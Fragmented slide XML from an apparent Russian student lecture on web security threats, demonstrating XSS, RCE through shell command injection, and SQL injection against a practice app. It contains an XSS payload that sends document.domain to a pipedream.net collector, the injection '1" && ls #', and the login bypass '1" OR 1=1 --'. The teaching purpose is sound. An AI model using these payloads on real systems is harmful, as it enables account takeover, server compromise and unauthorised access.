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ce220d0a5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ce220d0a5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ce220d0a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ce220d0a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ce220d0a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ce220d0a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ce220d0a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ce220d0a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ce220d0a5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ce220d0a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ce220d0a5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ce220d0a5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a90ce5b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9a90ce5b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a90ce5bb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a90ce5bb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a90ce5bb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a90ce5bb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a90ce5bb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9a90ce5bb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ce220d0a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ce220d0a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a90ce5bb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a90ce5bb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a90ce5bb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9a90ce5bb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9a90ce5bb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9a90ce5bb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a90ce5bb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a90ce5bb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a90ce5bb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9a90ce5bb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a90ce5bb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a90ce5bb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9a90ce5bb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9a90ce5bb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9a90ce5bb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9a90ce5bb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a90ce5bb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a90ce5bb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9a90ce5bb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9a90ce5bb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ce220d0a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ce220d0a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ce220d0a5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ce220d0a5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ce220d0a5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ce220d0a5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ce220d0a5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ce220d0a5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ce220d0a5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ce220d0a5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ce220d0a5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ce220d0a5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ce220d0a5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ce220d0a5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JaysesS/Overview-of-web-vulnerabiliti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36100" y="1289850"/>
            <a:ext cx="5632500" cy="20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Угрозы веб безопасности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Подготовил студент группы ИЗ-41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Ольшанский Владислав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XSS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153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Reflected XSS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Stored XSS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DOM-based XSS (?)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Reflected XSS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2206339" y="1425100"/>
            <a:ext cx="6394500" cy="11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Боб знает о уязвимости на сервере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Формирует вредоносную ссылку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Отправляет Алисе</a:t>
            </a:r>
            <a:endParaRPr sz="1500"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225" y="1425100"/>
            <a:ext cx="472225" cy="232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2206342" y="2642439"/>
            <a:ext cx="6394500" cy="11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Алиса не</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t> знает о уязвимости на сервере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Переходит по ссылке Боба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К примеру, куки уходят к Бобу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“Дарит” Бобу контроль над своим аккаунтом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Практикуемся</a:t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100" y="1117875"/>
            <a:ext cx="557380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Отправим как задумано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538" y="1149725"/>
            <a:ext cx="491893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Эксплуатируем</a:t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1117875"/>
            <a:ext cx="3925637" cy="35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7097" y="1117875"/>
            <a:ext cx="3688000" cy="14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Разбираемся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97500" y="1153525"/>
            <a:ext cx="7580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1337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var img = new </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="6495E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" sz="12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B0B7C3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img.src = </a:t>
            </a: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"https://enm3vddkwx8b.x.pipedream.net?some_data="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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56B7C3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document.getElementById(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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'body'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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).appendChild(img)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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56B7C3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900" y="3008600"/>
            <a:ext cx="588645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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> XSS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2206339" y="1425100"/>
            <a:ext cx="6394500" cy="11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Боб знает о уязвимости на сервере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Боб формирует, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>например</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>, комментарий с нагрузкой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Ждёт</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/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225" y="1425100"/>
            <a:ext cx="472225" cy="232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2206342" y="2642439"/>
            <a:ext cx="6394500" cy="11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Алиса не знает о уязвимости на сервере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Заходит на сайт, браузер отрисовывает комментарий Боба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Алиса “данные” данные Бобу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Практикуемся</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="239" name="Google Shape;239;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="3063" r="1488" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1086025"/>
            <a:ext cx="7635950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Отправим как задумано</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="245" name="Google Shape;2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375" y="1165675"/>
            <a:ext cx="681116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Эксплуатируем</a:t>
            </a:r>
            <a:endParaRPr/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950" y="1205475"/>
            <a:ext cx="5849989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 чём?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Что такое веб-приложение?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Какие есть уязвимости?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Возможно ли написать уязвимое, если использовать новые технологии?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Разбираемся</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp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1297500" y="1010200"/>
            <a:ext cx="7580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1337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var img = new </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="6495E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" sz="12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B0B7C3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img.src = </a:t>
            </a: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"https://enm3vddkwx8b.x.pipedream.net?some_data="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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56B7C3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document.getElementById(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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'body'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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).appendChild(img)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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56B7C3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pic>
        <p:nvPicPr>
          <p:cNvPr id="258" name="Google Shape;2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475" y="2694788"/>
            <a:ext cx="587692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RCE</a:t>
            </a:r>
            <a:endParaRPr/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1297500" y="1185375"/>
            <a:ext cx="7739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RCE (Remote code execution) - является максимальной угрозой класса А1 по классификации OWASP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Возможность удаленного внедрения кода в серверный скрипт в 100% случаев приводит к взлому ресурса.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С помощью RCE злоумышленник сразу получает доступ к серверу атакуемого сайта, размещая на нем веб-шеллы, или любой другой вредоносный код.</a:t>
            </a:r>
            <a:endParaRPr sz="1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Начинаем</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="270" name="Google Shape;2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338" y="1078050"/>
            <a:ext cx="427733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Смотрим код</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="276" name="Google Shape;2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450" y="936825"/>
            <a:ext cx="6392999" cy="40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Продолжаем смотреть код</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="282" name="Google Shape;2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52600"/>
            <a:ext cx="7275850" cy="18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вообще происходит?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Google Shape;288;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477725" y="1607350"/>
            <a:ext cx="8559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Команда формируемая на сервере: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command = 'echo "' + str(note) + '" &gt; ' + os.path.join(os.path.abspath("."),'data_rce/')+ str(randint(0,100)) + '.txt'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Упростим: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command = 'echo "' + </a:t>
            </a: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</a:rPr>
              <a:t>ВВОД_ПОЛЬЗОВАТЕЛЯ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> + '" &gt; data_rce/рандомное_число.txt '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Команда которая уходит в терминал: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echo "</a:t>
            </a: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</a:rPr>
              <a:t>ВВОД_ПОЛЬЗОВАТЕЛЯ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>" &gt; data_rce/рандомное_число.txt</a:t>
            </a:r>
            <a:endParaRPr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Эксплуатируем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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1567550"/>
            <a:ext cx="7038900" cy="14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echo "</a:t>
            </a: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</a:rPr>
              <a:t>ВВОД_ПОЛЬЗОВАТЕЛЯ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>" &gt; data_rce/рандомное_число.txt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А если ввод пользователя будет с </a:t>
            </a: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en" sz="1400"/>
              <a:t> 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К примеру такой: </a:t>
            </a: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</a:rPr>
              <a:t>1"</a:t>
            </a:r>
            <a:endParaRPr sz="140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295" name="Google Shape;2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675" y="3162225"/>
            <a:ext cx="55245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Почему? И давай уже ..</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Google Shape;301;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1193325"/>
            <a:ext cx="7038900" cy="18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Вывод про ошибку синтаксиса bash логичен, ведь получилась команда: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echo "</a:t>
            </a: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en" sz="1400"/>
              <a:t>" &gt; data_rce/рандомное_число.txt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Поправим и посмотрим что есть в данной директории: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echo "</a:t>
            </a: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</a:rPr>
              <a:t>1" &amp;&amp; ls #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>" &gt; data_rce/рандомное_число.txt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02" name="Google Shape;3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625" y="3162150"/>
            <a:ext cx="549592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Найдем</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> секрет</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="308" name="Google Shape;3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625" y="1046250"/>
            <a:ext cx="3692758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Спасибо за внимание</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Google Shape;314;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="20930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https://github.com/JaysesS/Overview-of-web-vulnerabilities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550" y="223825"/>
            <a:ext cx="7924800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</a:t>
            </a:r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1385400" y="1234125"/>
            <a:ext cx="76515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Как происходит уязвимая авторизация?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Получили с формы данные от пользователя, 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к примеру username - “jayse”, а пароль - “candal”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Делаем запрос в БД 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SELECT * FROM Users WHERE username=”jayse” AND password=”candal”;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Если БД нам ответило, то пропускаем, иначе выводим “Проверьте ввод”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Начинаем шалости c SQL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Google Shape;158;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066925" y="1234125"/>
            <a:ext cx="80097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Изначальный запрос: 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SELECT * FROM Users WHERE username=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"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jayse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” AND password=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"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candal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”;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Заменим </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600"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jayse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на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="160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1” OR 1=1 --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и что произойдёт?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SELECT * FROM Users WHERE username=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="160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1” OR 1=1 --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” AND password=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="16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3434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”;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Запрос “преобразился” в совсем другой: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SELECT * FROM Users WHERE username=”1” OR 1=1;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81575" y="234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Пробуем на практике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787" y="856075"/>
            <a:ext cx="6640475" cy="40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Форма</a:t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 rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="1419" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1326075" y="1149700"/>
            <a:ext cx="688282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Вводим правильно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575" y="1460225"/>
            <a:ext cx="5806834" cy="353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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="899725"/>
            <a:ext cx="36387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admin : admin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Вводим инъекцию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922600"/>
            <a:ext cx="26916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Admin : 1” OR 1=1 --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985" y="1456900"/>
            <a:ext cx="6427525" cy="188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3622850"/>
            <a:ext cx="6773100" cy="1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И мы не зная пароля очутились в каком-то кабинете.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В нашем случае еще и выводится что отдало БД.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